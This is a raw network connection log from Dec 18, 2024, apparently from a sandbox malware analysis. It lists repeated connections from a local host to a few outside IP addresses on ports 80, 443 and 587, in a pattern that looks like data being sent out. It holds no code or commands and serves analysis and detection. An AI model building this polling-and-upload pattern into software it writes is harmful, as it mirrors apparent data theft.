Dec 18, 2024 13:44:55.680470943 CET	443	49722	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:55.680639029 CET	49722	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:55.680948019 CET	49722	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:55.680963993 CET	443	49722	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:55.722963095 CET	49715	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:56.900306940 CET	443	49722	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:56.914854050 CET	49722	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:56.914896965 CET	443	49722	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:57.354603052 CET	443	49722	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:57.354675055 CET	443	49722	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:57.354726076 CET	49722	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:57.355401039 CET	49722	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:57.359127045 CET	49715	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:57.360977888 CET	49723	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:57.480024099 CET	80	49715	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:57.480103016 CET	49715	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:57.481794119 CET	80	49723	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:57.481858015 CET	49723	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:57.482086897 CET	49723	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:57.601671934 CET	80	49723	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:58.787100077 CET	80	49723	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:58.788276911 CET	49730	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:58.788326025 CET	443	49730	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:58.788489103 CET	49730	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:58.788767099 CET	49730	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:58.788785934 CET	443	49730	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:58.832331896 CET	49723	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:59.999794006 CET	443	49730	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:00.008250952 CET	49730	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:00.008291006 CET	443	49730	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:00.459058046 CET	443	49730	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:00.459139109 CET	443	49730	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:00.459212065 CET	49730	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:00.459640026 CET	49730	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:00.463269949 CET	49723	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:00.464456081 CET	49737	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:00.583370924 CET	80	49723	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:00.583467960 CET	49723	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:00.584184885 CET	80	49737	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:00.584280968 CET	49737	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:00.584429979 CET	49737	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:00.703974962 CET	80	49737	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:01.036950111 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:01.156702995 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:01.156788111 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:01.157088041 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:01.277165890 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:09.003864050 CET	80	49737	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:09.005482912 CET	49755	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:09.005521059 CET	443	49755	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:09.005610943 CET	49755	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:09.005856991 CET	49755	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:09.005887985 CET	443	49755	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:09.051253080 CET	49737	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:10.220822096 CET	443	49755	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:10.230113983 CET	49755	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:10.230140924 CET	443	49755	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:10.668978930 CET	443	49755	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:10.669048071 CET	443	49755	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:10.669101000 CET	49755	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:10.669715881 CET	49755	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:10.674096107 CET	49737	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:10.675204992 CET	49760	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:10.794028997 CET	80	49737	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:10.794126987 CET	49737	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:10.794715881 CET	80	49760	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:10.794801950 CET	49760	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:10.794975042 CET	49760	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:10.914467096 CET	80	49760	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:11.008951902 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:11.012480021 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:11.132025003 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:14.444562912 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:14.457931995 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:14.577543974 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:16.403681993 CET	80	49760	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:16.405113935 CET	49775	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:16.405155897 CET	443	49775	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:16.405222893 CET	49775	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:16.405522108 CET	49775	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:16.405534029 CET	443	49775	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:16.457309961 CET	49760	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:17.155584097 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:17.199409008 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:17.199457884 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:17.199549913 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:17.204569101 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:17.204590082 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:17.207329988 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:17.617046118 CET	443	49775	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:17.618832111 CET	49775	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:17.618850946 CET	443	49775	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.067122936 CET	443	49775	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.067190886 CET	443	49775	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.067251921 CET	49775	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.068052053 CET	49775	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.079756975 CET	49760	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:18.081185102 CET	49782	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:18.200171947 CET	80	49760	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:18.200226068 CET	49760	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:18.201258898 CET	80	49782	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:18.201334000 CET	49782	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:18.201514006 CET	49782	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:18.321702957 CET	80	49782	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:18.417732000 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.417890072 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.423681021 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.423696995 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.424417973 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.472949028 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.479754925 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.523330927 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.864842892 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.864911079 CET	443	49776	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:18.865014076 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.865890980 CET	49776	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:18.869766951 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:18.991235018 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:19.295334101 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:19.297580957 CET	49783	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:19.297631025 CET	443	49783	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:19.297703028 CET	49783	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:19.297970057 CET	49783	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:19.297982931 CET	443	49783	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:19.347915888 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:20.507671118 CET	80	49782	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:20.509156942 CET	49789	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:20.509195089 CET	443	49789	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:20.509264946 CET	49789	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:20.509504080 CET	49789	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:20.509516954 CET	443	49789	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:20.509829044 CET	443	49783	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:20.511288881 CET	49783	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:20.511331081 CET	443	49783	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:20.551178932 CET	49782	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:20.956439972 CET	443	49783	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:20.956512928 CET	443	49783	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:20.956563950 CET	49783	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:20.957051992 CET	49783	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:20.960259914 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:20.961191893 CET	49790	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:21.080238104 CET	80	49738	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:21.080302954 CET	49738	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:21.080884933 CET	80	49790	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:21.080948114 CET	49790	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:21.081108093 CET	49790	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:21.203244925 CET	80	49790	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:21.722076893 CET	443	49789	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:21.723808050 CET	49789	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:21.723835945 CET	443	49789	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:22.169671059 CET	443	49789	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:22.169755936 CET	443	49789	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:22.169868946 CET	49789	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:22.170357943 CET	49789	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:22.173453093 CET	49782	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:22.174010992 CET	49792	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:22.294241905 CET	80	49782	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:22.294256926 CET	80	49792	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:22.294327974 CET	49782	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:22.294348001 CET	49792	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:22.294537067 CET	49792	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:22.386730909 CET	80	49790	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:22.387917042 CET	49797	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:22.387939930 CET	443	49797	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:22.388026953 CET	49797	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:22.388232946 CET	49797	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:22.388246059 CET	443	49797	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:22.414439917 CET	80	49792	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:22.441745043 CET	49790	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:23.598457098 CET	80	49792	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:23.599914074 CET	49798	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:23.599941015 CET	443	49798	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:23.600020885 CET	49798	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:23.600292921 CET	49798	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:23.600310087 CET	443	49798	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:23.610405922 CET	443	49797	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:23.611923933 CET	49797	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:23.611958981 CET	443	49797	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:23.644800901 CET	49792	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:24.055183887 CET	443	49797	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:24.055243015 CET	443	49797	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:24.055346966 CET	49797	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:24.055758953 CET	49797	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:24.059341908 CET	49790	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:24.060236931 CET	49800	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:24.179434061 CET	80	49790	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:24.179676056 CET	80	49800	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:24.179738045 CET	49790	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:24.179747105 CET	49800	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:24.179924965 CET	49800	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:24.302896976 CET	80	49800	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:24.812170982 CET	443	49798	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:24.813890934 CET	49798	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:24.813911915 CET	443	49798	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:25.266222000 CET	443	49798	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:25.266299963 CET	443	49798	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:25.266357899 CET	49798	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:25.269594908 CET	49798	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:25.298038006 CET	49792	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:25.418493032 CET	80	49792	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:25.418613911 CET	49792	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:25.437104940 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:25.437150955 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:25.437227964 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:25.437804937 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:25.437819958 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:26.487622023 CET	80	49800	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:26.488950014 CET	49807	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:26.488998890 CET	443	49807	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:26.489097118 CET	49807	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:26.489334106 CET	49807	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:26.489347935 CET	443	49807	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:26.535475969 CET	49800	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:26.807053089 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:26.807203054 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:26.808923006 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:26.808931112 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:26.809191942 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:26.810750008 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:26.851327896 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:27.313939095 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:27.314039946 CET	443	49805	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:27.314366102 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:27.316766977 CET	49805	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:27.701045990 CET	443	49807	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:27.702816010 CET	49807	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:27.702853918 CET	443	49807	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:28.150474072 CET	443	49807	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:28.150531054 CET	443	49807	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:28.150603056 CET	49807	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:28.150963068 CET	49807	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:28.154369116 CET	49800	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:28.155651093 CET	49812	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:28.274343967 CET	80	49800	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:28.274457932 CET	49800	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:28.275281906 CET	80	49812	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:28.275357008 CET	49812	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:28.275527954 CET	49812	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:28.395013094 CET	80	49812	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:29.578427076 CET	80	49812	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:29.579883099 CET	49818	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:29.579935074 CET	443	49818	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:29.580024958 CET	49818	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:29.580303907 CET	49818	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:29.580316067 CET	443	49818	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:29.629183054 CET	49812	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:30.792670012 CET	443	49818	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:30.794327021 CET	49818	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:30.794357061 CET	443	49818	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:31.240804911 CET	443	49818	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:31.240859032 CET	443	49818	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:31.240945101 CET	49818	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:31.241436005 CET	49818	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:31.246198893 CET	49824	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:31.365781069 CET	80	49824	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:31.365951061 CET	49824	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:31.366010904 CET	49824	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:31.485754013 CET	80	49824	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:32.512406111 CET	49708	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:32.670057058 CET	80	49824	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:32.672629118 CET	49825	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:32.672658920 CET	443	49825	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:32.672725916 CET	49825	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:32.672945023 CET	49825	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:32.672955990 CET	443	49825	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:32.722888947 CET	49824	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:33.092367887 CET	49828	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:45:33.212254047 CET	587	49828	3.130.71.34	192.168.2.5
Dec 18, 2024 13:45:33.215547085 CET	49828	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:45:33.924213886 CET	443	49825	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:33.935223103 CET	49825	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:33.935254097 CET	443	49825	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:34.421547890 CET	443	49825	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:34.421628952 CET	443	49825	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:34.421689987 CET	49825	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:34.422280073 CET	49825	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:34.425617933 CET	49824	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:34.426656008 CET	49832	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:34.545900106 CET	80	49824	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:34.546014071 CET	49824	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:34.546672106 CET	80	49832	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:34.546746969 CET	49832	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:34.546960115 CET	49832	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:34.670721054 CET	80	49832	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:37.865587950 CET	80	49832	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:37.866831064 CET	49844	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:37.866883039 CET	443	49844	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:37.866986990 CET	49844	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:37.867258072 CET	49844	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:37.867271900 CET	443	49844	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:37.910387039 CET	49832	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:39.090291023 CET	443	49844	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:39.093014956 CET	49844	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:39.093029976 CET	443	49844	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:39.549416065 CET	443	49844	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:39.549493074 CET	443	49844	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:39.549577951 CET	49844	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:39.549973965 CET	49844	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:39.553442955 CET	49832	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:39.555270910 CET	49846	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:39.673423052 CET	80	49832	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:39.673480988 CET	49832	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:39.675018072 CET	80	49846	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:39.675133944 CET	49846	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:39.675235033 CET	49846	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:39.796122074 CET	80	49846	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:41.274636984 CET	80	49846	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:41.277467966 CET	49851	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:41.277498007 CET	443	49851	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:41.277587891 CET	49851	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:41.277811050 CET	49851	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:41.277826071 CET	443	49851	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:41.316685915 CET	49846	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:42.502650023 CET	443	49851	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:42.504751921 CET	49851	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:42.504777908 CET	443	49851	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:42.962347031 CET	443	49851	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:42.962434053 CET	443	49851	104.21.67.152	192.168.2.5
Dec 18, 2024 13:45:42.962517977 CET	49851	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:42.962959051 CET	49851	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:45:42.971564054 CET	49846	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:42.971894026 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:42.971937895 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:42.973372936 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:42.973777056 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:42.973802090 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:43.091399908 CET	80	49846	132.226.247.73	192.168.2.5
Dec 18, 2024 13:45:43.093755960 CET	49846	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:45:44.340275049 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:44.340388060 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:44.375274897 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:44.375293016 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:44.375648022 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:44.377460957 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:44.423326969 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:44.854895115 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:44.854981899 CET	443	49857	149.154.167.220	192.168.2.5
Dec 18, 2024 13:45:44.855072021 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:44.855488062 CET	49857	443	192.168.2.5	149.154.167.220
Dec 18, 2024 13:45:50.036310911 CET	49812	80	192.168.2.5	132.226.247.73
